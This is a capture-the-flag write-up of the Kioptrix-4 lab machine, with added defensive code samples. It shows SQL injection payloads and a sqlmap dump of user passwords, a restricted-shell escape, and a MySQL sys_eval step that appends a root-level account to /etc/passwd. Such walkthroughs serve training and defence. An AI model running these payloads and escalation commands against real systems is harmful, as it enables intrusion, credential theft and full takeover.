Welcome to the Kioptrix-4 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Kioptrix-4
Tags: Vulnhub, Easy, Linux, OSCP
Platform: Vulnhub
Difficulty: Easy
OS: Linux
Link: Kioptrix: Level 1.3 (#4)
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:24 CEST
Nmap scan report for 172.20.10.9
Host is up (0.0011s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80,139,445 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:25 CEST
Nmap scan report for 172.20.10.9
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 2h49m42s, median: 2h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2021-07-01T10:25:28-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 172.20.10.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.32 seconds
Port 80
On the website on port 80 we find a login form. Trying a SQL injection with the classic payload ' OR '1'='1 we see that we get in, even though the page reports an error.
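Why does ' OR '1'='1 log us in at all? As an added illustration (this is neither the box's PHP code nor the author's script), here is a small Python stand-in for a checklogin.php-style query: the vulnerable version concatenates the form fields into the SQL text, so the quote in the password field closes the string literal and the rest of the input rewrites the WHERE clause; the hardened version binds the fields as parameters. The members table is seeded with the two rows from the dump; the table schema and the sqlite3 backend are assumptions made for the demo.

```python
import sqlite3

# Constructed seed data: the two rows the writeup dumps from members.members.
# The table schema and the SQLite backend are assumptions made for this demo.
SEED_ROWS = [
    (1, "john", "MyNameIsJohn"),
    (2, "robert", "ADGAdsafdfwt4gadfga=="),
]


def make_db():
    """In-memory stand-in for the box's MySQL 'members' database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def login_vulnerable(conn, username, password):
    """Hypothetical reconstruction of a checklogin.php-style query built by
    string concatenation. Whatever the user types becomes part of the SQL,
    so a quote in the password field rewrites the WHERE clause:
      ... AND password='' OR '1'='1'   -> true for every row.
    Returns the matched username or None."""
    query = (
        "SELECT username FROM members WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Same lookup with bound parameters: the driver sends the values
    separately from the SQL text, so they can never change its structure."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"  # the classic payload from the writeup
    print("vulnerable:", login_vulnerable(db, "anybody", tautology))  # john
    print("hardened:  ", login_hardened(db, "anybody", tautology))    # None
```

Binding the parameters closes both the authentication bypass and the blind channel that the author's script and sqlmap rely on (the page answering "Wrong Username" for a false condition and something else for a true one), because the password field can no longer alter the query. The clear-text password storage that the dump reveals is a separate weakness that parameterization does not address.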
Blind SQL Injection
As I am completing this box as training for the OSCP, and SQLMap is not allowed in the exam, I have written a script to do the exploitation by hand.
$ python3 blindSQLinjector.py -u http://172.20.10.9/checklogin.php -f 'myusername' -f 'mypassword' -p mypassword -H '{"Content-Type": "application/x-www-form-urlencoded","Cookie": "PHPSESSID=52757c941a411bfc3df3bf45c1c2e406"}' -e 'Wrong Username'
+---------------------------------------+
| Database: members | Table: members |
+----+----------+-----------------------+
| id | username | password |
+----+----------+-----------------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
Anyway, so that everyone can see how to do it with SQLMap, here it is!
SQLMap
$ sqlmap -u http://172.20.10.9/checklogin.php --data="myusername=admin&mypassword=admin5&Submit=Login" -D members -T members --dump
sqlmap {1.5.2#stable} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:33:24 /2021-07-01/
[21:33:25] [INFO] resuming back-end DBMS 'mysql'
[21:33:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=HMFmOXVY&mypassword=-3789' OR 1396=1396#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=HMFmOXVY&mypassword=v2W!k6n!K5' AND (SELECT 7971 FROM (SELECT(SLEEP(5)))ywLP)-- BXgs&Submit=Login
---
[21:33:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[21:33:25] [INFO] fetching columns for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 3
[21:33:25] [INFO] resumed: id
[21:33:25] [INFO] resumed: username
[21:33:25] [INFO] resumed: password
[21:33:25] [INFO] fetching entries for table 'members' in database 'members'
[21:33:25] [INFO] fetching number of entries for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: 1
[21:33:25] [INFO] resumed: MyNameIsJohn
[21:33:25] [INFO] resumed: john
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: ADGAdsafdfwt4gadfga==
[21:33:25] [INFO] resumed: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
[21:33:25] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/172.20.10.9/dump/members/members.csv'
[21:33:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.20.10.9'
[*] ending @ 21:33:25 /2021-07-01/
Exploitation
Now that we have the users' passwords, we try them over SSH and manage to log in, but we land in a restricted shell.
$ ssh john@172.20.10.9
john@172.20.10.9's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd clear echo exit help ll lpath ls
john:~$
After reading online about how to escape it and trying various methods, we manage to break out by using the echo command to execute the Python call os.system('/bin/bash').
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$
Post exploitation
Privilege escalation: user to user
Enumeration
Linpeas
[+] MySQL connection using root/NOPASS ................. Yes
[+] Searching mysql credentials and exec
Found lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');
Exploitation
Linpeas tells us that we can access MySQL as root without a password and that the lib_mysqludf_sys.so library is present, so we can execute system commands as root from MySQL using the sys_eval() function.
john@Kioptrix4:~$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 77819
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| members |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SELECT sys_eval('id');
ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist
As we can see, the function has not been created, but we can create it ourselves and then use it.
mysql> CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)
mysql> SELECT sys_eval('id');
+----------------+
| sys_eval('id') |
+----------------+
| NULL |
+----------------+
1 row in set (0.01 sec)
Cool! Now that we can use it, we inject a user with root privileges into the /etc/passwd file.
mysql> select sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 146120912 |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
Now we should be able to authenticate as the injected user and become root!
john@Kioptrix4:~$ su x4v1l0k
Password:
Failed to add entry for user x4v1l0k.
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john#
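Two of the findings in this section are easy to check for from the defender's side: a MySQL root account with no password next to a command-execution UDF library, and a /etc/passwd entry with uid 0 (here with a password hash embedded directly in the file rather than in /etc/shadow) that is not root. The following Python audit is added here and is not part of the writeup; it runs over a constructed /etc/passwd sample that includes the line appended above, over constructed rows in the shape of mysql.user, and over a constructed plugin-directory listing. The sample data and the function names are assumptions.

```python
# Constructed sample /etc/passwd: ordinary default lines plus the entry the
# writeup appends via sys_eval() (that last line is taken from the page).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
john:x:1001:1001:,,,:/home/john:/bin/lshell
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
"""

# Constructed rows in the shape of `SELECT User, Host, Password FROM mysql.user`
# on a MySQL 5.0 server; a root account with an empty Password column is what
# linpeas reported as root/NOPASS. The non-empty hash is a made-up placeholder.
SAMPLE_MYSQL_USERS = [
    ("root", "localhost", ""),
    ("root", "Kioptrix4", ""),
    ("debian-sys-maint", "localhost", "*0123456789ABCDEF0123456789ABCDEF01234567"),
]

# UDF libraries that turn SQL access into OS command execution. The page shows
# lib_mysqludf_sys; the set is otherwise an assumption and can be extended.
DANGEROUS_UDF_LIBS = {"lib_mysqludf_sys.so"}


def audit_passwd(passwd_text):
    """Return (line_no, account, reason) tuples for suspicious passwd entries."""
    findings = []
    for line_no, line in enumerate(passwd_text.splitlines(), start=1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry"))
            continue
        name, pw_field, uid, _gid, _gecos, _home, _shell = fields
        # Any uid-0 account other than root is a backdoor until proven otherwise.
        if uid == "0" and name != "root":
            findings.append((line_no, name, "uid 0 account other than root"))
        # Shadowed systems keep hashes in /etc/shadow; the passwd field should
        # be 'x' or a lock marker. A real hash here bypasses shadow entirely,
        # and an empty field means login without a password.
        if pw_field == "":
            findings.append((line_no, name, "empty password field"))
        elif pw_field not in ("x", "*", "!", "!!"):
            findings.append((line_no, name, "password hash stored in /etc/passwd"))
    return findings


def audit_mysql_users(rows):
    """Return (user, host) pairs whose Password column is empty."""
    return [(user, host) for user, host, password in rows if password == ""]


def audit_plugin_dir(filenames):
    """Return the command-execution UDF libraries found in a plugin dir listing."""
    return sorted(set(filenames) & DANGEROUS_UDF_LIBS)


if __name__ == "__main__":
    for line_no, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"/etc/passwd:{line_no}: {name}: {reason}")
    for user, host in audit_mysql_users(SAMPLE_MYSQL_USERS):
        print(f"mysql: '{user}'@'{host}' has no password")
    for lib in audit_plugin_dir(["lib_mysqludf_sys.so", "ha_archive.so"]):
        print(f"mysql plugin dir: {lib} allows OS command execution from SQL")
```

On a live system the inputs would come from reading /etc/passwd, from the mysql.user table, and from listing the server's plugin directory. The chain on this box needs all three conditions at once: passwordless MySQL root, a UDF library on disk, and a mysqld process running as root so that sys_eval() inherits its privileges; removing any one of them breaks it, and the passwd check catches the persistence it leaves behind.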
And that's all!
I have enjoyed doing this box, as I had never exploited a blind SQL injection manually before. And thanks to this box, now I have my own script to exploit them!! :D